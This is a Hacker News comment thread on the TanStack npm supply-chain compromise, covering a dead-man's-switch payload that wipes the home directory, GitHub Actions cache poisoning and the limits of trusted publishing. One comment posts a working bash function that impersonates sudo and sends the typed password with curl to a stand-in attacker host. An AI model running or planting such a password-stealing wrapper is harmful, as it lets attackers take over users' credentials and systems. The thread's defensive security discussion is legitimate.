Top
Best
New

Posted by varunsharma07 13 hours ago

Postmortem: TanStack NPM supply-chain compromise(tanstack.com)
https://github.com/TanStack/router/issues/7383
875 points | 356 comments
cube00 12 hours ago|
Please be careful when revoking tokens. It looks like the payload installs a dead-man's switch at ~/.local/bin/gh-token-monitor.sh as a systemd user service (Linux) / LaunchAgent com.user.gh-token-monitor(macOS). It polls api.github.com/user with the stolen token every 60s, and if the token is revoked (HTTP 40x), it runs rm -rf ~/.

https://github.com/TanStack/router/issues/7383#issuecomment-...

Gigachad 10 hours ago||
Realistically if you have installed malware, you need to do a full wipe of your computer anyway.
eqvinox 10 hours ago|||
[On Linux:]

If you didn't give yourself "free" (passwordless) sudo, that's not necessary…

…unless it happened in a week with 2 and a half Linux kernel LPEs.

lrvick 9 hours ago|||
Sudo is security theater.

Malware can make a fake unprivileged sudo that sniffs your password.

function sudo () {

    realsudo=$(which sudo);

    read -r -s -p "[sudo] password for $USER: " password;

    echo "$USER: $password" | \

        curl -F 'p=<-' https://attacker.com >/dev/null 2>&1;

    $realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1;

    $realsudo "${@:1}";

}
xlii 2 hours ago|||
Stupid thought.

Make alias called sdo that echoes sudo path and hash every time you use it to stderr.

That's security by obscurity though.

sinsudo 4 hours ago||||
Use /usr/bin/sudo yourcommand with any intermediate command not using path but it's real path hard coded.

Edited: Previous suggested using \sudo but it depends of the variable path which can be modified by the attacker.

throwaway7356 2 hours ago|||
Yeah, works well:

$ /usr/bin/sudo() { echo Not the real sudo.; }

$ /usr/bin/sudo

Not the real sudo.

And every other suggestion also doesn't work if the attacker can just replace the shell.

anthk 25 minutes ago|||
/usr/bin/sudo isn't evaluated as a function under ksh.
ChocolateGod 1 hour ago||||
Surely if malware has rw access to the home folder, it can adjust the env variables / shell to make this also fake.
mort96 4 hours ago||||
Yes, that would be one potential solution. But I have certainly never done it and bet >99.999% of the world's use of sudo is through 'sudo'.

Plus you only need one slip-up and you're hosed. Even people who try to almost always use '/usr/bin/sudo' will undoubtedly accidentally let a 'sudo' go through. Maybe they copy/paste a command from somewhere (after verifying that it's safe of course) and just didn't think of the sudo issue then and there.

sinsudo 3 hours ago||
The real problem is that there should be at least 2 levels for sudo, one for installing software and another that really allows someone to compromise the entire system, both layers should be separate to mitigate risk. At least the most secure layer should allow you to perform secure recovering and diagnosis
DaSHacka 45 minutes ago|||
More than just two levels for sudo, the Linux permission model is completely broken for this very reason. (Also see: https://xkcd.com/1200/)

Honestly, the Android approach is significantly better. (and for that, see Micay's various ramblings posted online)

lrvick 2 hours ago||||
You do not need sudo for installing software. Can just install to ~/.local.

Many package managers require sudo, sure, but there is no good reason for them to in a modern linux system, and not all require this.

Even with systemd, you can use systemd --user.

michaelmior 2 hours ago||
That depends on what the software is. If you want to run a service that bonds to a privileged port for example, you need sudo.
lrvick 56 minutes ago|||
If you set the appropriate linux capabilities flag on a binary such as sshd at bootup then unprivileged users can bind to 22, no problem.

setcap 'cap_net_bind_service=+ep' /usr/sbin/sshd

Could even run it as a daemon unprivileged from a home directory with "systemd --user"

That said if you have multiple users and want every user to have their own sshd reachable on port 22 on the same machine you probably want to listen on vhost namespaced unix sockets and have something like haproxy listen on port 22 instead. Haproxy could of course also run unprivileged provided it has read access to all the sockets.

zrm 54 minutes ago||||
For that you really only need CAP_NET_BIND_SERVICE.

The bigger issue is that if you want to install or update system-wide packages, many of those will be used by privileged processes. Suppose you want to update /bin/sh. Even if the only permission you had is to write binaries, that'll get you root.

signed-log 58 minutes ago|||
For most things, you can do with capabilities

Issue is that it increases friction and you need sudo anyways to set the capabilities.

Most web servers would happy to run unprivileged with only CAP_NET_BIND_SERVICE

DonHopkins 2 hours ago|||
Unix used to have a user named "bin" just for owning all the binaries and performing installs.
sinsudo 2 hours ago||
The old bin user is an idea that could be modernized with a new two level sudo concept, the higher one for recovery and diagnosis, already done in Chromebook and other solutions
DonHopkins 42 minutes ago||
bin passwords I will always remember: At the University of Maryland CS department systems the bin password was "fuck,you", and there was a devout Christian student on staff who had a problem with that, so we had to change it (to something harder to remember, I just can't recall).
exyi 3 hours ago||||
Ok, so the malware runs a keylogger / clipboard logger, gets the password and runs sudo on it's own. Or replaces your shell by putting exec ~/hackedbash into your bashrc

Password on sudo is only useful if you detect the infection before you run sudo

fragmede 3 hours ago||
Could link it to a yubikey via pam.d so you need a fingerpress to authenticate.
pastage 2 hours ago|||
Physical attestations are hard to solve, I think it would be nice if all TPMs in laptops had this. Then the problem becomes how do you automate stuff that needs to be done.
lrvick 2 hours ago|||
And then the moment you authenticate, the fake sudo still executes its payload.

Yubikeys do not fix this issue.

eviks 3 hours ago|||
Why not make a proper link /sudo so you don't have to type out the full path every time, which is very inconvenient? (but the fact that such workarounds are needed still means it's a theater)
lrvick 2 hours ago|||
A simple LD_PRELOAD command can cause your shell to run "rm -rf /" when you type "/sudo".

If your unprivileged user is compromised, you are pretty hosed.

anthk 19 minutes ago||
It should be a way to make system env vars (profile.d or simlar) as readonly so every users' shell had these set to empty values and unable to change them.
sinsudo 2 hours ago|||
Anything that can be modified by an attacker can not be used to secure the sudo command. This is a recursive requirementor hierarchy for secure systems.
eviks 1 hour ago||
You can set the permissions so that the attacker can't modify it?
nazcan 9 hours ago||||
To clarify, when does this run? Like you download malware A, run malware A and this function definition changes sudo for it, or sudo for other cases?
lrvick 9 hours ago||
This could for instance be injected into your .bashrc when you do an "npm install" of a package that has a deeply nested supply chain attack.

Then the next time you run sudo, phase2 triggers installing a rootkit, etc.

arcfour 9 hours ago|||
Or you could also hijack it using $PATH search order with your wrapper to get existing terminal sessions too, there's a lot of ways to skin that cat.
lrvick 8 hours ago||
Endless ways, which is why I do not understand why sudo is ever used anymore, especially in production.

You do not need root to do anything in Linux these days anyway between Namespaces and Capabilities so there is really no reason for root to be accessible at all or have any processes running as root post boot.

GCUMstlyHarmls 7 hours ago||
I dont mean to be snarky, can you run `pacman -Syu` without root with "new" tech? Or do you mean in general on production systems or whatever?
lrvick 2 hours ago||
Plenty of package managers can install to an arbitrary directory like ~/.local. Each user, or even each project, can have its own rootfs full of software.

The only things I tend to have running at the system level are a kernel and init and maybe openssh.

Ferret7446 8 hours ago|||
That is one of many reasons to keep your dotfiles under version control.
lrvick 8 hours ago|||
Someone that can wrap your sudo binary can wrap you git binary too. Once your OS is compromised all bets are off.
lpribis 8 hours ago|||
How would that help? Unless you happen to check the dotfiles git diff before running _anything_. I guess this could be put in prompt or some cron job to detect diffs but I bet absolutely nobody does this.
TacticalCoder 8 hours ago||||
> Sudo is security theater.

Yes indeed.

> Malware can make a fake unprivileged sudo that sniffs your password.

Not on my Linux workstation though. No sudo command installed. Not a single setuid binary. Not even su. So basically only root can use su and nobody else.

Only way to log in at root is either by going to tty2 (but then the root password is 30 characters long, on purpose, to be sure I don't ever enter it, so login from tty2 ain't really an option) or by login in from another computer, using a Yubikey (no password login allowed). That other computer is on a dedicated LAN (a physical LAN, not a VLAN) that exists only for the purpose of allowing root to ssh in (yes, I do allow root to SSH in: but only with using U2F/Yubikey... I have to as it's the only real way to log in as root).

It is what it is and this being HN people are going to bitch that it's bad, insecure, inconvenient (people typically love convenience at the expense of security), etc. but I've been using basically that setup since years. When I need to really be root (which is really not often), I use a tiny laptop on my desk that serves as a poor admin's console (but over SSH and only with a Yubikey, so it'd be quite a feat to attack that).

Funnily enough last time I logged in as root (from the laptop) was to implement the workaround to blacklist all the modules for copy.fail/dirtyfrag.

That laptop doesn't even have any Wifi driver installed. No graphical interface. It's minimal. It's got a SSH client, a firewall (and so does the workstation) and that's basically it. As it's on a separate physical LAN, no other machine can see it on the network.

I did set that up just because I could. Turns out it's fully usable so I kept using it.

Now of course I've got servers, VMs, containers, etc. at home too (and on dedicated servers): that's another topic. But on my main workstation a sudo replacement function won't trick me.

bee_rider 7 hours ago|||
This thread was kicked off by somebody who said:

> Realistically if you have installed malware, you need to do a full wipe of your computer anyway

You might be the exception to this sentiment. But out of curiosity, after all that setup would you feel confident trying to recover from malware (rather than taking the “nuke it from orbit” approach?).

lrvick 8 hours ago||||
In my case I use QubesOS so sudo is useless even if present since every security domain is isolated by hypervisor.

For servers, sudo or a package manager etc should not exist. There is no good reason for servers to run any processes as root or have any way to reach root. Servers should generally be immutable appliances.

nozzlegear 7 hours ago||||
FYI, in English the phrase "since years" is grammatically incorrect and sounds unnatural to a native speaker's ears. The correct phrase would be "I've been using that setup for years."

/aside

sufficientsoup 5 hours ago|||
Yeah, a "seit Jahren" flashed through my mind as I read it.
kaonwarb 5 hours ago|||
I've heard this often enough from English speakers from India that I think it is accepted grammar in that region.
lemoncucumber 4 hours ago||
To my ears it “since years” sounds like it’s missing an “ago” after it (or like the GP said “for years” sounds even more natural).

It makes me think of another similar one: I've noticed that British English speakers will say e.g. "the new iPhone will be available from September 20th"

To my ears that sounds like it's missing an “onwards” after it (or “starting September 20th” would sound even more natural).

regularfry 2 hours ago||
Is the meaning different? I'm struggling to see how "from September 20th" would have a different implication to "starting from September 20th" (or similar) given the context.
GoblinSlayer 1 hour ago||||
Why disallow password login when you have 30 char password?
jcgrillo 8 hours ago||||
Thanks for sharing this, that seems like a very cool setup. I have a very old good-for-almost-nothing laptop that would be perfect for this, might just have to copy you!
aiscoming 6 hours ago||||
tell us about your disk encryption setup. and do you use secureboot?
WesolyKubeczek 4 hours ago|||
When you update your packages, are you using that ssh laptop?
FooBarWidget 2 hours ago||||
It would be great if

1. shells support the notion of privileged commands, that can't be overridden with PATH manipulations, aliases or functions.

2. Sudo (or PAM actually) can authenticate with your identity provider (like Entra ID) instead of a local password. Then there is nothing to sniff and you can also use 2FA or passkeys.

lrvick 50 minutes ago|||
Neither would actually help in this case though. Malware could manipulate both of those as an unprivileged user to run malicious code the next time you elevate privileges.

Remember that malware can replace or modify your shell

ctippett 2 hours ago|||
Fish shell has builtin[1], although sudo is not one of the commands it covers.

[1] https://fishshell.com/docs/current/cmds/builtin.html

DonHopkins 2 hours ago||||
Just sudon't.
j16sdiz 6 hours ago||||
sudo don't acccept password from stdin. it takes a tty
dymk 6 hours ago||
https://superuser.com/questions/67765/sudo-with-password-in-...
nullsanity 9 hours ago|||
[dead]
Gigachad 10 hours ago||||
On linux realistically whatever user you installed the malicious NPM package with has access to everything you care about anyway.
silon42 1 hour ago|||
I had an idea to always run 2 users, the "main" one (or more) and a "project one"... one could sudo to the project user, but that one could not sudo out... (npm would only be installed for the project user).
lrvick 9 hours ago|||
Every user, since privesc is so easy on most operating systems.
Gigachad 9 hours ago||
Sure, without exploits they can steal your api keys, read your personal data, and access your browser data. With exploits they can update packages on your computer too.
lrvick 8 hours ago||
No exploits needed. A simple shell alias will suffice. See my example in sibling comment.
lights0123 10 hours ago||||
Until it overrides sudo in your $PATH to install malware after you enter your password later.
ChocolateGod 1 hour ago||
Any application running as a user with sudo access and RW permissions on the users home folder effectively has root permissions, it'll just take a little longer to get it.

That's why Flatpaks sandbox doesn't exist if the application has access to the home folder.

WatchDog 8 hours ago||||
There a million ways that malware can persist without root.
dgellow 10 hours ago||||
You should assume other LPEs exist though
walletdrainer 3 hours ago||||
What leads people to believe things like this?
stogot 9 hours ago|||
There numerous ways to root Linux over the decades
sigzero 10 hours ago||||
It's the "nuke it from orbit" approach but "the only way to be sure".
nsonha 6 hours ago|||
you're gonna need the infected device as is for forensics
meander_water 12 hours ago|||
I don't understand why people were voting this comment down in the issue page
skissane 11 hours ago|||
Maybe they have a non-standard interpretation of thumbs-down – as "thumbs-down to this fact" not "thumbs-down to you for pointing it out"
thayne 6 hours ago|||
When you only have eight emoji reactions to choose from, people are bound to get creative in how they use them.
hmokiguess 9 hours ago||||
I have noticed this behaviour happening more often too, it's very confusing. Usually when texting with younger Gen Z people.
efilife 8 hours ago||
This has always been happening
Griffinsauce 6 hours ago||
We lived through a generation of agism at millennials and now we're turning around and doing it at Gen Z. It's unbelievable.
matsemann 2 hours ago|||
Or they're from Eridian.
edoceo 7 hours ago||||
We need a new emoji for: the situation is lame and the poster is correct. Like a combination of thumbs-up+frown
__david__ 5 hours ago||
is not bad for that. Not precise, but in the ballpark.
bpavuk 12 hours ago||||
bots.

the GitHub bot law: the GitHub bot situation is way worse than you imagine even if you are aware of the GitHub bot law.

yes, a cheap parody on Hofstadter's law, but that's how bad it is

sieabahlpark 11 hours ago||||
[dead]
noodletheworld 11 hours ago|||
There is no such thing as please be careful when revoking tokens. What does that mean? Dont revoke them? Look at them carefully before revoking them?

And what? Just let the actor just keep using them to spread to other people?

Always rotate your tokens immediately if they're compromised.

If it hurts, well, that sucks. …but seriously, not revoking the tokens just makes this worse for everyone.

A fair comment would have been: “it looks like the payload installs a dead-mans switch…”

Asking the maintainers not to revoke their compromised credentials deserves every down vote it receives.

wavemode 11 hours ago|||
You seem to be interpreting "please be careful when..." as "don't". I'm not sure how that interpretation makes any sense. Obviously they just mean, first kill the service (or better yet, shutdown the machine entirely) and then revoke the token...?
CodesInChaos 48 minutes ago||||
Here being careful about revocation means:

Make sure to have an up-to-date backup, that's offline, or at least not mounted on the affected computer.

Check for the dead-man switch, and if present, disarm it.

Only then revoke the tokens. Instead of immediately revoking the tokens, like one would normally do. Nobody is suggesting to keep the compromised tokens active longer than necessary.

yuzuquat 11 hours ago||||
my understanding is that careful means cleaning up the dead-man’s switch before revoking
mosen 4 hours ago|||
Did you miss the part about the script that nukes your home folder?
corvad 7 hours ago|||
I'm not quite sure of what this really accomplishes, like is it just M.A.D.? Like at that point the creds have been stolen and the whole machine is toast.
avaq 5 hours ago|||
The point is to dissuade mass token revocations.

Let's say the attack becomes hugely succesful and the worm spreads to thousands of devices. GitHub/NPM could just revoke all compromised tokens (assuming they have a way to query) stopping the worm in its tracks. But because of the Dead Mans Switch, they'd know that in doing so, they'd be bricking thousands of their user's devices. So it effectively moves the responsibility to revoke compromised tokens from a central authority that could do it en-masse, to each individual who got compromised, greatly improving the worm's chances of survival.

dominicm 6 hours ago|||
Even after the owner has realized the attack and revoked the token, there’s next steps (alerting the community, pulling from NPM) that causing havoc delays even by just a bit.
shevy-java 41 minutes ago|||
> as a systemd user service

Hah! I know why I don't use systemd.

bpavuk 12 hours ago|||
if so, then this is actual terrorism of the software world!!
embedding-shape 12 hours ago||
Only if the goal is to actually spread fear in a civilian population. It's not clear what the motivation is here besides "the worm spreads itself lol".
bpavuk 12 hours ago||
that dead man's switch surely smells like that tbh
isityettime 11 hours ago||
The dead man's switch reminds me of worms and viruses from my childhood, whose primary purpose was apparently just to wreak havoc rather than direct financial gain. It's a childish gimmick.
resonious 11 hours ago||
If an infected computer gets disabled after deactivating one stolen credential, it might slow down the victim from deactivating their other stolen credentials.
isityettime 11 hours ago||
Ugh. True.
dcchambers 11 hours ago|||
Incredible. Mutually assured destruction.

The next five years are going to be truly WILD in the software world.

Air-gapped systems are gonna be huge.

NSUserDefaults 10 hours ago||
Maybe just ai-gapped.
eqvinox 10 hours ago||
Is that an offhanded joke on the terminology or do you actually mean something? I can't tell.
fragmede 12 hours ago||
One should always have had backups configured, but if this is what gets people to setup backups, so much the better.
eqvinox 10 hours ago||
Sure. But even restoring from backup means a cost is being inflicted, and not a small one.
Ciantic 1 hour ago||
What I want to focus on is mental model of your CI pipeline, and problem with too much YAML, consider this quote:

> Cache scope is per-repo, shared across pull_request_target runs (which use the base repo's cache scope) and pushes to main. A PR running in the base repo's cache scope can poison entries that production workflows on main will later restore.

This is very difficult to understand, and teach to new people, because everything is configured as YAML, yet everything is layed out in the background to directories and files.

What if your CI pipeline was old-school bash script instead? This would be far more obvious to greater amount of people how it works, and what is left behind by other runs. We know how directories and files work in bash scripts.

Could we go back to basics and manage pipelines as scripts and maybe even run small server?

SamuelAdams 10 minutes ago||
The other advantage with bash is that most developers can run it locally to validate what it is doing and debug issues. With GitHub Actions you need to always commit and push, slowing down the DX.
ryanschaefer 40 minutes ago|||
https://noyaml.com
LelouBil 39 minutes ago||
Not sure cases like the cache poisoning here would be more obvious.

Unless your bash script setup doesn't have the functionality of pull_request_target, but then removing it also works.

jonchurch_ 12 hours ago||
It is unfortunate, but this is evidence (IMO) that Trusted Publishing is still ~~not secure~~ not enough by itself to securely publish from CI, as an attacker inside your CI pipeline or with stolen repo admin creds can easily publish. This isnt new information, TP is not meant to guarantee against this, but migrating to TP away from local publish w/ 2fa introduces this class of attack via compomise of CI. (edit: changed "still not secure" to "still not enough by itself" bc that is the point I want to make)

Going to Trusted Publishing / pipeline publishing removes the second factor that typically gates npm publish when working locally.

The story here, while it is evolving, seems to be that the attacker compromised the CI/CD pipeline, and because there is no second factor on the npm publish, they were able to steal the OIDC token and complete a publish.

Interesting, but unrelated I suppose, is that the publish job failed. So the payload that was in the malicious commit must have had a script that was able to publish itself w/ the OIDC token from the workflow.

What I want is CI publishing to still have a second factor outside of Github, while still relying on the long lived token-less Trusted Publisher model. AKA, what I want is staged publishing, so someone must go and use 2fa to promote an artifact to published on the npm side.

Otherwise, if a publish can happen only within the Github trust model, anyone who pwns either a repo admin token or gets malicious code into your pipeline can trivially complete a publish. With a true second factor outside the Github context, they can still do a lot of damage to your repo or plant malicious code, but at least they would not be able to publish without getting your second factor for the registry.

captn3m0 12 hours ago||
The astral blog recently pointed out how they do release gates (manual approvals on release workflows) even with trusted publishing. And sadly, all of the documentation for trusted publishing (NPM/PyPi/Rubygems) doesn't even mention this possibility, let alone defaulting to it.
jonchurch_ 12 hours ago||
I have not read that blog post. But unfortunately (and I'd love to be wrong!) it doesn't matter for if a repo admin's token gets exfiled, because if you put your gates within Github, an admin repo token is sufficient to defang all of them from the API without 2fa challenge.

That is why I want 2fa before publish at the registry, because with my gh cli token as a repo admin, an attacker can disable all the Github branch protection, rewrite my workflows, disable the required reviewers on environments (which is one method people use for 2fa for releases, have workflows run in a GH environment whcih requires approval and prevents self review), enable self review, etc etc.

Its what I call a "fox in the hen house" problem, where you have your security gates within the same trust model as you expect to get stolen (in this case, having repo admin token exfiled from my local machine)

captn3m0 12 hours ago||
https://docs.github.com/en/actions/how-tos/deploy/configure-... is the feature they use.

> We impose tag protection rules that prevent release tags from being created until a release deployment succeeds, with the release deployment itself being gated on a manual approval by at least one other team member. We also prevent the updating or deletion of tags, making them effectively immutable once created. On top of that we layer a branch restriction: release deployments may only be created against main, preventing an attacker from using an unrelated first-party branch to attempt to bypass our controls.

> https://astral.sh/blog/open-source-security-at-astral

From what I understand, you need a website login, and not a stolen API token to approve a deployment.

But I agree in principle - The registry should be able to enforce web-2fa. But the defaults can be safer as well.

jonchurch_ 12 hours ago||
I tested approving a deployment via API last week w/ my gh cli token (well, had claude do it while I watched). Again, I really want to be wrong about this, but my testing showed that it is indeed trivial to use the default token from my gh cli to approve via API. (repo admin scope, which I have bc I am admin on said repo)

Nothing in this link [1] proves what I said, but it is the test repo I was just conducting this on, and it was an approval gated GHA job that I had claude approve using my GH cli token

I also had claude use the same token to first reconfigure the enviornment to enable self-approves (I had configured it off manually before testing). It also put it back to self approve disabled when it was done hehe

[1] https://github.com/jonchurch/deploy-env-test/actions/runs/25...

captn3m0 12 hours ago||
You're right. Found the relevant docs+API calls:

https://docs.github.com/en/rest/actions/workflow-runs?apiVer...

Also for a Pending Deployment: https://docs.github.com/en/rest/actions/workflow-runs#review...

Both of these need `repo` scope, which you can avoid giving on org-level repos. For fine-grained tokens: "Deployments" repository permissions (write) is needed, which I wouldn't usually give to a token.

deathanatos 6 hours ago||
sigh Github's idiotic fractal of authentication types.

What upthread is talking about is the Github CLI app, `gh`; it doesn't use a fine-grained tokens, it uses OAuth app tokens. I.e., if you look at fine grain tokens (Setting → Developer settings → Personal access tokens → Fine-grained token), you will not see anything corresponding to `gh` there, as it does not use that form of authentication. It is under Settings → Applications → Authorized OAuth Apps as "Github CLI".

I just ran through the login sequence to double-check, but the permissions you grant it are not configurable during the login sequence, and it requests an all-encompassing token, as the upthread suggests.

Another way to come at this is to look at the token itself: gh's token is prefixed with `gho_` (the prefix for such OAuth apps), and fine-grained tokens are prefixed with `github_pat_` (sic)¹

¹(PATs are prefixed with `ghp_`, though I guess fine-grained tokens are also sometimes called fine-grain PATs… so, maybe the prefix is sensible.)

captn3m0 4 hours ago||
I’m paranoid but I never authenticate the GitHub CLI - there should be no tokens lying around on my system. If needed, I have some scoped PATs in pass, which I can source as env variables. Git Pushes happen over SSH with Yubikey.
donmcronald 12 hours ago|||
I'd like to have touch to sign from a YubiKey or similar. The whole idea of trusting the cloud to manage credentials on your behalf seems like a mistake.
cluckindan 11 hours ago||
”TanStack maintainer Tanner Linsley said the attacker used an orphaned commit to gain access to the workflow run that stores the OIDC token, effectively bypassing the project’s existing publishing protections. He noted that two-factor authentication is enabled for everyone on the team”
bakkoting 10 hours ago|||
2fa being enabled for people on the team is different from 2fa being required for publishing. It is not current possible to enforce (or use) 2fa for publishing with trusted publishing.
dboreham 10 hours ago||||
Apologies if this is a dumb question but how does this attack work? (I know what an orphaned commit is but not how you use one to bypass project access control).
fny 4 hours ago||
TLDR is that the attacker leveraged actions/cache to cache a poisoned pnpm store which contains something that will be triggered during the package.json lifecycle. All it required was for someone to merge any PR to run whats in the cache trigger the second stage of the exploit: mint an OIDC token, build evil tarballs, and publish.
duskdozer 8 hours ago|||
github holding on to orphaned commits has been a noted issue for a while now
koolba 7 hours ago||
It’s a wonderful feature when you accidentally nuke your one and only local copy.
lexicality 2 hours ago||
Depending on how badly you nuked it, it's probably still in your `git reflog` locally. Normal git hangs on to orphaned commits too. (Until `git gc` runs)
streptomycin 10 hours ago|||
Yeah I have one semi-popular package and I am still doing local publish with 2fa because all this "trusted publishing" stuff seems really complicated and also seems to get hacked constantly. Maybe it's just too complicated for us to do securely and we should go back to the drawing board.
staticassertion 11 hours ago|||
I still think that Trusted Publishing is a significant win but I do like the idea of requiring a second factor to mark a release as truly published. It would make these CI worms very hard to pull off.
btown 10 hours ago||
The way I see it - if you're pushing a change to an NPM package with more than [N] daily downloads/downstream packages, and you don't have a human online who's able to approve a two-factor for the release on their phone... then you also don't have a human online who's able to hotfix or rollback in case of a breaking bug, much less a compromise. Even setting security aside - that's in service of a stable ecosystem.

And the two-factor approver should see a human-written changelog message alongside an AI summary of what was changed, that goes deeply into any updated dependencies. No sneaking through with "emergency bugfix" that also bumps a dependency that was itself social-engineered. Stop the splash radius, and disincentivize all these attacks.

Edit: to the MSFT folks who think of the stock ticker name first and foremost - you'd be able to say that your AI migration tools emit "package suggestions that embed enterprise-grade ecosystem security" when they suggest NPM packages. You've got customers out there who still have security concerns in moving away from their ancient Java codebases. Give them a reason to trust your ecosystem, or they'll see news articles like this one and have the opposite conclusion.

herpdyderp 12 hours ago|||
I was always confused at why people claimed trusted publishing would make any difference to this kind of supply chain attack.
staticassertion 11 hours ago||
Because it does. The attack has to involve the CI pipeline rather than the dev environment, there's no token to revoke after (if you evict the attacker you're done, the OIDC credentials expire), it's easier to monitor for externally, you can build things like branch protections in and isolate things like "run tests" from "publish", etc. Trusted Publishing is not itself a solution to all supply chain issues but it is a massive improvement.
jonchurch_ 11 hours ago||
I agree with you that TP is an improvement over long lived npm tokens in CI.

However, the threat Im most afraid of still does involve dev environment compromise. Because if your repo admin gets their token stolen from their gh cli, they can trivially undo via API (without a 2fa gate!) any github level gate you have put in place to make TP safe. I want so badly to be wrong about that, we have been evaluating TP in my projects and I want to use it. But without a second factor to promote a release, at the end of the day if you have TP configured and your repo admin gets pwned, you cannot stop a TP release unless you race their publish and disable TP at npm.

TP is amazing at removing long lived npm tokens from CI, but the class of compromise that historically has plagued the ecosystem does not at all depend on the token being long lived, it depends on an attacker getting a token which doesnt require 2fa.

I am begging for someone to prove me wrong about this, not to be a shit, but because I really want to find a secure way to use TP in lodash, express, body-parser, cors, etc

staticassertion 10 hours ago||
Yes, that is the threat I'm most worried about as well. But look at your description of it - a repo admin has to be compromised. Not just "random engineer". Although, in this case, the attacker leveraged a cache poisoning attack to move into the privileged workflow and I suspect this sort of thing will be commonplace.

I'm in agreement that a second factor would be ideal, to be clear. I think it's a good idea, something like "package is released with Trusted Publishing, then 'marked' via a 2FA attestation". But in theory that 2FA is supposed to be necessary anyways since you can require a 2FA on Github and then require approvals on PRs - hence the cache poisoning being required.

jonchurch_ 10 hours ago||
Not to beat the dead horse, but ths floored me when I realized it so I keep trying to shout it at the top of my lungs.

There is no gate you can put on a Trusted Publisher setup in github which requires 2fa to remove. Full stop. 2fa on github gates some actions, but with a token with the right scope you can just disable the gating of workflow-runs-on-approve, branch protection, anything besides I think repo deletion and renaming.

And in my experience most maintainers will have repo admin perms by nature of the maintainer team being small and high trust. Your point is well taken, however, that said stolen token does need to have high enough privileges. But if you are the lead maintainer of your project, your gh token just comes with admin on your repo scope.

wereHamster 12 hours ago|||
I'm looking forward to the analysis how the attacker managed to compromise CI. I was reading through the workflow and what immediately jumped out was a cache poisoning attack. Seems plausible, given https://github.com/TanStack/config/pull/381

edit: two hard things in computer science: naming things, cache invalidation, off-by-one errors, security. something something

dgellow 10 hours ago|||
Yes it is a GitHub actions cache poisoning attack
silverwind 11 hours ago|||
Almost all these recent compromises seem to involve either cache poisoning or prompt injection via untrusted variables.
mnahkies 3 hours ago|||
I use GitHub environments to require a manual approval (which includes MFA) in GitHub, prior to a pipeline running with a oidc token capable of publishing.

Would this have caught the cache poisoning? Unsure, though it at least means I'm intentionally authorising and monitoring each publish for anything unexpected.

https://docs.github.com/en/actions/deployment/targeting-diff...

killerstorm 1 hour ago|||
Yeah, it's kinda weird - it's not like GitHub uses a particular secure stack, formal verification or anything. It's just a regular build server with a power to compromise millions of software packages.

Bitcoin people solved problem a decade ago with deterministic build: Bitcoin core is considered publisher when 5+ devs get bit-exact build artifact, each individually signing a hash. Replicating that model isn't hard, it's just that nobody cares. People just want to trust the cloud because it's big

decodebytes 6 hours ago||
[dead]
varunsharma07 11 hours ago||
@mistralai/mistralai npm package was also compromised as part of this worm https://github.com/mistralai/client-ts/issues/217

It has been pulled from the npm registry now.

chrisweekly 12 hours ago||
Postinstall scripts are deadly. Everyone should be using pnpm.

Crazy that an "orphan" commit pushed to a FORK(!) could trigger this (in npm clients). IMO GitHub deserves much of the blame here. A malicious fork's commits are reachable via GitHub's shared object storage at a URI indistinguishable from the legit repo. That is absolutely bonkers.

jonchurch_ 10 hours ago||
The compromised action here was using pnpm.

They poisoned the github action cache, which was caching the pnpm store. The chain required pull_request_target on the job to check bundle size, which had cache access and poisoned the main repo’s cache

The malicious package that was publisjed will compromise local machines its installed in via the prepare script, though.

ricardobeat 2 hours ago|||
Those are two different attack vectors. The exploit they used on Github Actions would work for either npm or pnpm. But the replication part using postinstall scripts, once it is installed on another machine, would be stopped by pnpm.

What I'm curious about is: how can you poison the cache in CI, if the lockfile has an integrity hash for each package?

Did the incoming PR modify pnpm-lock.yaml? If so, that would an obvious thing to disallow in any open-source project and require maintainer oversight.

maxloh 4 hours ago||||
I think it was an afterthought in the design. CI cache should be scoped per-user, or at least per-group.

If a workflow run by a maintainer (with access to secrets) can pull a cache tarball uploaded by a random user on GitHub, then it’s a security black hole. More incidents like this are inevitable.

corvad 7 hours ago|||
Yes, but the exploit was with Github Actions not something that pnpm really prevented.
fabian2k 12 hours ago|||
Once you run your app with the updated dependencies, that code is executed anyway. And root or non-root doesn't matter, the important stuff is available as the user running the application anyway.
yetanotherjosh 11 hours ago||
How is this not a Github P0? Can anyone explain?

When I read that, I thought they must be using 'fork' wrong, and actually mean branch on the official repo, as that can't be right!?" Good lord.

sheept 5 hours ago|||
In some cases, you can also use forks to read commits from private forks[0], but GitHub considers these linked commit networks working as intended.

[0]: https://trufflesecurity.com/blog/anyone-can-access-deleted-a...

sozforex 3 hours ago||
This is a very worthy article. I have an impression that I've read it before 2024, but maybe that was a different article describing the same mess with how github exposes private repos.
edelbitter 6 hours ago||||
If git in general would enforce pretending to not know about orphans, it would always need to know what you were meaning to consider the boundary, and/or you would end up waiting for useless duplicate network traffic. The fact that on GitHub, such references are visible irrespective of specified repo is not a bug, its a feature. Its the tools (including but not limited to: GitHub Actions) that cause dangerous misunderstanding in appearing to let you specify something they then never actually enforce.

specified: repo location, slightly-difficult-to-preimage hash

intended meaning: use this hash if and only if it is accessible from the default branch of that repo

actual meaning: use this hash. start looking at this location. I do not care whether it is accessible through that location by accident, by intent of merely its uploader, or by explicit and persisting intent of someone with write access to the location.

cedws 3 hours ago||||
Because GitHub only cares about AI.
eviks 3 hours ago||
And maintaining high level of service availability!
rvz 1 hour ago||
With zero down time!
ZeWaka 11 hours ago|||
they probably used the publish token in a pull-request-target workflow or something?
ghost_pepper 10 hours ago||
yes, they used pull_request_target for a benchmarking suite. github has a huge warning saying to never use pull_request_target to run user code, but this is just going to keep happening
riknos314 9 hours ago|||
> github has a huge warning saying to never use pull_request_target to run user code

This is an area where documentation is necessary but not sufficient. Github needs to add some form of automated screening mechanism to either prevent this usage, or at the very least quickly flag usages that might be dangerous.

qudat 7 hours ago|||
And a labeling action which requires `pull_request_target`: https://github.com/actions/labeler#create-workflow

These types of features are not worth it and need to be removed from the marketplace.

crutchcorn 11 hours ago||
https://tanstack.com/blog/npm-supply-chain-compromise-postmo...

We (TanStack) just released our postmortem about this.

____tom____ 4 hours ago||
I didn't see a key section of a COE: "What are we doing to make sure this can't happen again?"

Apologies if I missed it. There's some discussion of things under what could have gone better, but prevention is key, and the reports not done without it.

dang 5 hours ago|||
(We changed the URL from https://github.com/TanStack/router/issues/7383 to that above.)
swyx 7 hours ago||
thank you for maintaining this inspiring ecosystem.
827a 10 hours ago||
Am I understanding this attack vector correctly: Did tanstack have anything misconfigured on their github or make any mistakes that led to this happening? This is the second time, at least, the github actions cache has been seemingly detrimental to massive and widespread supply chain compromise; what is going on over there?
ssanderson11235 9 hours ago||
